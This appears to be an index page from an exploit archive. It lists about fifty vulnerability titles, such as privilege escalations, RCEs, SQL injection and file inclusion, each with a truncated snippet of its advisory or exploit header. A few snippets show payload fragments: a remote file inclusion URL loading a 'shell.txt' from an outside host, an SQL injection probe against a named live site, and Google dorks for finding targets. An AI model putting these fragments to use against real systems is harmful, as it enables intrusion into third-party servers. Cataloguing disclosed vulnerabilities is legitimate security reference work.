Oracle Java JDKJRE 1.8.0.131 Apache Xerces 2.11.0 - PDFDocx Server Side Denial of Service

Oracle Java JDKJRE 1.8.0.131 Apache Xerces 2.11.0 - PDFDocx Server Side Denial of Service Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in Oracle Java JDK/JRE 1.8.0.131 and previous versions packages and Apache Xerces 2.11.0 The vulnerabilities are: Oracle...

Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure

Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure Vulnerability Summary The following advisory describes sensitive information Disclosure found in Tiandy IP cameras version 5.56.17.120 Tianjin Tiandy Digital Technology Co., Ltd Tiandy Tech is “one of top 10 leading CCTV manufacture...

Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure

Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure !/usr/bin/env python Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure Vendor: Petr Nejedly | Six Lines Ltd Product web page: http://www.serviio.org Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0,...

Horde Groupware Webmail 345 - Multiple Remote Code Executions

Horde Groupware Webmail 345 - Multiple Remote Code Executions Source: https://blogs.securiteam.com/index.php/archives/3107 Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in Horde Groupware Webmail. Horde Groupware Webmail Edition is a free, enterprise ready,...

Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory

Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1039 The Samba server is supposed to only grant access to configured share directories unless "wide links" are enabled, in which case the server is allowed to...

Nagios 4.2.2 - Local Privilege Escalation

Nagios 4.2.2 - Local Privilege Escalation Affected Product: Nagios 4 Vulnerability Type: root privilege escalation Fixed in Version: N/A Vendor Website: https://www.nagios.com/ Software Link: : https://sourceforge.net/projects/nagios/files/latest/download?source=directory-featured Affected Versio...

SweetRice 1.5.1 - Arbitrary File Upload

SweetRice 1.5.1 - Arbitrary File Upload /usr/bin/python -- Coding: utf-8 -- Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload Exploit Author: Ashiyane Digital Security Team Date: 03-11-2016 Vendor: http://www.basic-cms.org/ Software Link:...

IBM AIX 5.36.17.17.2 - lquerylv Local Privilege Escalation

IBM AIX 5.36.17.17.2 - lquerylv Local Privilege Escalation !/usr/bin/sh AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset 7100-04 This exploit takes advantage of known issues with debugging functions within the AIX linker library. We are taking advantage of known...

AVTECH IP Camera NVR DVR Devices - Multiple Vulnerabilities

AVTECH IP Camera NVR DVR Devices - Multiple Vulnerabilities ''' Avtech devices multiple vulnerabilities -------------------------------------------------- Platforms / Firmware confirmed affected: - Every Avtech device IP camera, NVR, DVR and firmware version. 4 contains the list of confirmed...

phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution

phpMyAdmin 4.6.2 - Authenticated Remote Code Execution !/usr/bin/env python """cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7. CVE: CVE-2016-5734 Author:...

SAP NetWeaver AS JAVA 7.1 7.5 - Directory Traversal

SAP NetWeaver AS JAVA 7.1 7.5 - Directory Traversal Application: SAP NetWeaver AS JAVA Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5 Vendor URL: http://SAP.com Bug: Directory traversal Sent: 29.09.2015 Reported: 29.09.2015 Vendor response: 30.09.2015 Date of Public Advisory: 08.03.2016...

Zabbix 2.2 3.0.3 - API JSON-RPC Remote Code Execution

Zabbix 2.2 3.0.3 - API JSON-RPC Remote Code Execution !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Zabbix RCE with API JSON-RPC Date: 06-06-2016 Exploit Author: Alexander Gurin Vendor Homepage: http://www.zabbix.com Software Link: http://www.zabbix.com/download.php Version: 2.2 - 3.0.3...

PHPXMLRPC 1.1 - Remote Code Execution

PHPXMLRPC 1.1 - Remote Code Execution PHPXMLRPC Remote Code Execution Vendor: Useful Information Inc. Product: PHPXMLRPC Version: = 1.1 Website: http://phpxmlrpc.sourceforge.net/ BID: 14088 CVE: CVE-2005-1921 OSVDB: 17793 SECUNIA: 15852 PACKETSTORM: 38394 Description: PHPXMLRPC aka XML-RPC For PH...

ManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities

ManageEngine OpManager Applications Manager IT360 - FailOverServlet Multiple Vulnerabilities Multiple vulnerabilities in FailOverServlet in ManageEngine OpManager, Applications Manager and IT360 Discovered by Pedro Ribeiro [email protected], Agile Information Security...

osCommerce 2.3.4 - Multiple Vulnerabilities

osCommerce 2.3.4 - Multiple Vulnerabilities Title: osCommerce 2.3.4 - Multiple vulnerabilities Date: 10.07.14 Affected versions: = 2.3.4 latest atm Vendor: oscommerce.com Tested on: Apache 2.2.22 at Debian Contact: smash at devilteam.pl Cross Site Scripting 1. Reflected XSS - Send Email Vulnerabl...

Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities

Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities 1. Advisory Information Title: Oracle VirtualBox 3D Acceleration Multiple Memory...

AjaXplorer 1.0 - Multiple Vulnerabilities

AjaXplorer 1.0 - Multiple Vulnerabilities Trustwave SpiderLabs Security Advisory TWSL2013-027: Multiple Vulnerabilities in AjaXplorer Published: 09/05/13 Version: 1.0 Vendor: AjaXplorer http://ajaxplorer.info Product: AjaXplorer Version affected: 5.0.2 and prior Product description: AjaXplorer is...

Samba 3.5.223.6.174.0.8 - nttrans Reply Integer Overflow

Samba 3.5.223.6.174.0.8 - nttrans Reply Integer Overflow Exploitation: samba nttrans reply integer overflow / \ / \ | || | | | \ / / . || | | | / | handlenttrans +- callnttransactcreate // transact! - readnttrnsealistvulnerable function security bug analyze smbd/nttrans.c ---- snip ---- snip ----...

McAfee SuperScan 4.0 - Cross-Site Scripting

McAfee SuperScan 4.0 - Cross-Site Scripting Trustwave SpiderLabs Security Advisory TWSL2013-024: Cross Site Scripting XSS vulnerability in McAfee Superscan 4.0 Published: 08/02/2013 Version: 1.0 Vendor: McAfee http://www.mcafee.com/ Product: SuperScan Version affected: v4.0 Product description:...

Spring Framework - Arbitrary code Execution

Spring Framework - Arbitrary code Execution CVE-2010-1622: Spring Framework execution of arbitrary code Severity: Critical Vendor: SpringSource, a division of VMware Versions Affected: 3.0.0 to 3.0.2 2.5.0 to 2.5.6.SEC01 community releases 2.5.0 to 2.5.7 subscription customers Earlier versions ma...

Samba 3.0.10 3.3.5 - Format String Security Bypass

Samba 3.0.10 3.3.5 - Format String Security Bypass The following proof of concept is available: smb: \ put aa%3Fbb...

VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal

VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal source: https://www.securityfocus.com/bid/36842/info VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain...

Pligg 9.9.5b - Arbitrary File Upload SQL Injection

Pligg 9.9.5b - Arbitrary File Upload SQL Injection !/usr/bin/perl =about Pligg 9.9.5 Beta Perl exploit AUTHOR discovered & written by Ams ax330d doggy gmail dot com VULN. DESCRIPTION: Vulnerability hides in 'evb/checkurl.php' unfiltered $GET'url' parameter. Actually, it has filtration. Filtration...

Squirrelcart 1.x - cart.php Remote File Inclusion

Squirrelcart 1.x - cart.php Remote File Inclusion Title : Squirrelcart config.php, line 13 - $siteisproot = "blablabla"; Exploit : squirrelcart//popupwindow.php?siteisproot=http://example.com/shell.txt? notes : registerglobals = off is needed it seems. milw0rm.com 2007-08-19...

Cartweaver 2.16.11 - ProdID SQL Injection

Cartweaver 2.16.11 - ProdID SQL Injection author:meoconxatvnbrain.net product:CartWeaver main site:www.cartweaver.com 1.with CFM CartWeaver: sql injection in: Details.cfm?ProdID=a' demo: http://www.jbracing.co.uk/Details.cfm?ProdID=1' exploit: http://www.xxx.com/Details.cfm?ProdID=sql query link...

Sabdrimer PRO 2.2.4 - pluginpath Remote File Inclusion

Sabdrimer PRO 2.2.4 - pluginpath Remote File Inclusion VIRANGAR SECURITY TEAM Discovered By : A.nosrati www.virangar.org Public www.virangar.net Priv8 Mail: infoatvirangar.net Sabdrimer PRO v.2.2.4 Remote File Include Vulnerability Google Dork : "© Sabdrimer CMS" bug found in file : advanced1.php...

Wing FTP Server 6.2.5 - Privilege Escalation

Wing FTP Server 6.2.5 - Privilege Escalation Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation Google Dork: intitle:"Wing FTP Server - Web" Date: 2020-03-03 Exploit Author: Cary Hooper Vendor Homepage: https://www.wftpserver.com Software Link:...

Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)

Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure PoC Exploit Title: Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure PoC Discovery Date: 2019-01-31 Exploit Author: Nolan B. Kennedy nxkennedy Vendor Homepage: https://www.verodin.com/...

xglance-bin 11.00 - Privilege Escalation

xglance-bin 11.00 - Privilege Escalation Exploit Title: xglance-bin 11.00 - Privilege Escalation Exploit Author: Robert Jaroszuk and Marco Ortisi RedTimmy Security Date: 2020-02-01 Tested on: RHEL 5.x/6.x/7.x/8.x CVE: CVE-2014-2630 Disclamer: This exploit is for educational purpose only More...

Thrive Smart Home 1.1 - Authentication Bypass

Thrive Smart Home 1.1 - Authentication Bypass Exploit: Thrive Smart Home 1.1 - Authentication Bypass Date: 2019-12-30 Author: LiquidWorm Vendor: Thrive Product web page: http://www.thrivesmarthomes.com Affected version: 1.1 Tested on: Apache/2.4.41 centos OpenSSL/1.0.2k-fips Advisory ID:...

HomeAutomation 3.3.2 - Remote Code Execution

HomeAutomation 3.3.2 - Remote Code Execution Exploit: HomeAutomation 3.3.2 - Remote Code Execution Date: 2019-12-30 Author: LiquidWorm Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Tested on: Apache/2.4.41 centos OpenSSL/1.0.2k-fips...

Adaware Web Companion version 4.8.2078.3950 - WCAssistantService Unquoted Service Path

Adaware Web Companion version 4.8.2078.3950 - WCAssistantService Unquoted Service Path Exploit Title: Adaware Web Companion version 4.8.2078.3950 - 'WCAssistantService' Unquoted Service Path Date: 2019-11-06 Exploit Author: Mariela L Martínez Hdez Vendor Homepage: https://webcompanion.com/en/...

Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery

Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Date: 2019-10-25 Exploit Author: Prof. Joas Antonio Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://en.intelbras.com.br/node/25896 Version...

Jenkins Plugin Script Security 1.49Declarative 1.3.4Groovy 2.60 - Remote Code Execution

Jenkins Plugin Script Security 1.49Declarative 1.3.4Groovy 2.60 - Remote Code Execution !/usr/bin/env python Exploit Title : jenkins-preauth-rce-exploit.py Date : 02/23/2019 Authors : wetw0rk & 0xtavian Vendor Homepage : https://jenkins.oi Software Link : https://jenkins.io/download/ Tested on :...

Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (cron Method)

Linux Kernel 4.15.x 4.19.2 - mapwrite CAPSYSADMIN Local Privilege Escalation cron Method !/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47164.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses crontab technique ---...

Apple iOSmacOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem

Apple iOSmacOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem iohideventsystem is a MIG service which provides proxy access to various HID devices for untrusted clients. On iOS it's hosted by backboardd and on MacOS by hidd. The actual implementation is ...

Bayanno Hospital Management System 4.0 - Cross-Site Scripting

Bayanno Hospital Management System 4.0 - Cross-Site Scripting Exploit Title: Bayanno Hospital Management System 4.0 - Cross-Site Scripting Date: 2018-09-05 Software Link: https://codecanyon.net/item/bayanno-hospital-management-system/5814621 Exploit Author: Gokhan Sagoglu Vendor Homepage::...

ADB Broadband Gateways Routers - Privilege Escalation

ADB Broadband Gateways Routers - Privilege Escalation SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Privilege escalation via linux group manipulation product: All ADB Broadband Gateways / Routers based on Epicentro...

Siemens SIMATIC S7-1500 CPU - Remote Denial of Service

Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Google Dork: inurl:/Portal/Portal.mwsl Date: 2018-05-22 Exploit Author: t4rkd3vilz, Jameel Nabbo Vendor Homepage: https://www.siemens.com/ Version: SIMATIC S7-1500 CPU all...

D-Link DSL-3782 - Authentication Bypass

D-Link DSL-3782 - Authentication Bypass Exploit Title: D-Link DSL 3782 - Authentication Bypass Vendor Homepage: https://eu.dlink.com Version: A1WI20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT77616E6771696F6E67" Category: Webapps Exploit Author: Giulio Comi CVE : CVE-2018-8898 Dat...

DotNetNuke DNNarticle Module 11 - Directory Traversal

DotNetNuke DNNarticle Module 11 - Directory Traversal 01. Advisory Information Title: Directory Traversal Vulnerability in DNNarticle module Date published: n/a Date of last update: n/a Vendors contacted: zldnn.com Discovered by: Esmaeil Rahimian Severity: Critical 02. Vulnerability Information...

LineageOS 14.1 Blueborne - Remote Code Execution

LineageOS 14.1 Blueborne - Remote Code Execution Exploit Title: LineageOS 14.1 Android 7.1.2 Blueborne RCE CVE-2017-0781 Date: 04/01/2018 Exploit Author: Marcin Kozlowski Tested on: LinageOS 14.1 Android 7.1.2 without BlueBorne Patch CVE : CVE-2017-0781 Provided for legal security research and...

Advantech WebAccess 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow

Advantech WebAccess 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE Date: 03-29-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage:...

Oracle PeopleSoft - PeopleSoftServiceListeningConnector XML External Entity via DOCTYPE

Oracle PeopleSoft - PeopleSoftServiceListeningConnector XML External Entity via DOCTYPE Application: Oracle PeopleSoft Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55 Vendor URL: http://oracle.com Bug: XXE Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory:...

Concrete5 CMS 8.1.0 - Host Header Injection

Concrete5 CMS 8.1.0 - Host Header Injection + Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.concrete5.org Product:...

Apache Tomcat 876 (Debian-Based Distros) - Local Privilege Escalation

Apache Tomcat 876 Debian-Based Distros - Local Privilege Escalation ============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - CVE-2016-1240 - Release date: 30.09.2016 - Revision: 1 - Severity: High...

IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution

IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution !/usr/bin/python import BaseHTTPServer, socket IBM Security AppScan Standard OLE Automation Array Remote Code Execution Author: Naser Farhadi Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 Date: 1 June...

vldPersonals 2.7 - Multiple Vulnerabilities

vldPersonals 2.7 - Multiple Vulnerabilities Exploit Title: VLD Personal – Multiple Vulnerabilities Date: 09/11/2014 Exploit Author: Mr T Exploit Authors Website: http://www.securitypentester.ninja Vendor Homepage: http://www.vldpersonals.com/ Software Link:...

Microsoft Windows - OLE Package Manager SandWorm

Microsoft Windows - OLE Package Manager SandWorm !/usr/bin/env python import os import zipfile import sys ''' Full Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35019.tar.gz Very quick and ugly SandWorm CVE-2014-4114 exploit builder Exploit Title:...

Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities

Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities Advisory ID: HTB23154 Product: Exponent CMS Vendor: Online Innovative Creations Vulnerable Versions: 2.2.0 beta 3 and probably prior Tested Version: 2.2.0 beta 3 Vendor Notification: April 24, 2013 Vendor Patch: May 3, 2013 Public Disclosure: M...